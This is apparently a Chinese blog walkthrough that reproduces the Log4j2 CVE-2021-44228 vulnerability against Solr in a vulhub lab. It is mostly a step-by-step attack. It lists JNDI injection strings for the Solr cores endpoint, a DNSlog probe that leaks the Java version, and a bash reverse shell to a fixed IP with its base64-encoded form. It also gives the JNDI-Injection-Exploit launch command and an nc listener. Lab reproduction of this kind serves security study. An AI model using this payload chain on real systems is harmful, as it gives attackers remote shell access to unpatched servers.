当前位置: 首页 > article >正文

Log4j2漏洞复现

第一步:搭建靶场环境
#开启环境
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

来到网站首页

第二步:搭建一个dnslog平台上获取我们注入的效果

第三步:发现 /solr/admin/cores?action= 这里有个参数可以传

我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.kq25rl.dnslog.cn}

第四步:开始反弹shell
#需要用到一个工具JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
#安装java
yum install java
#反弹shell
bash -i >& /dev/tcp/[IP]/[端口] 0>&1
bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#反弹shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
#最终命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.7.133"
#注释
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。

第五步:进行JNDI注入
#新建终端并开启服务器监听
nc -lvvp 8888

第六步:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址
/solr/admin/cores?action=${jndi:ldap://8.155.7.133:1389/1niv1a}
${jndi:ldap://8.155.7.133:1389/1niv1a}

看到已经访问进来了

去监听端口的页面成功反弹Shell


http://www.kler.cn/a/450675.html

相关文章:

  • 使用git管理项目版本
  • 基于Liveweb地铁轨道交通视频监控综合管理系统方案
  • 【ROS2】坐标TF发布(静态)
  • 支付域——支付路由设计
  • Flutter组合动画学习
  • Linux系统编程深度解析:C语言实战指南
  • 了解RPC
  • 《Web 应用项目开发:从构思到上线的全过程》
  • UE5 渲染管线 学习笔记
  • 全国硕士研究生入学考试(考研)考研时间线之大三
  • 如何获取 ABAP 内表中的重复项
  • springboot容器无法获取@Autowired对象,报null对象空指针问题的解决方式
  • VSCode+WSL作为IDE开发和管理深度学习项目
  • 低代码软件搭建自学第二天——构建拖拽功能
  • SparkSQL与Hive语法差异
  • 畅捷通T+13管理员密码任意重置漏洞
  • 【C++动态规划 前缀和】937. 扣分后的最大得分|2105
  • 5、mysql的读写分离
  • 使用QML实现播放器进度条效果
  • spring mvcservlet跳转页面没有样式效果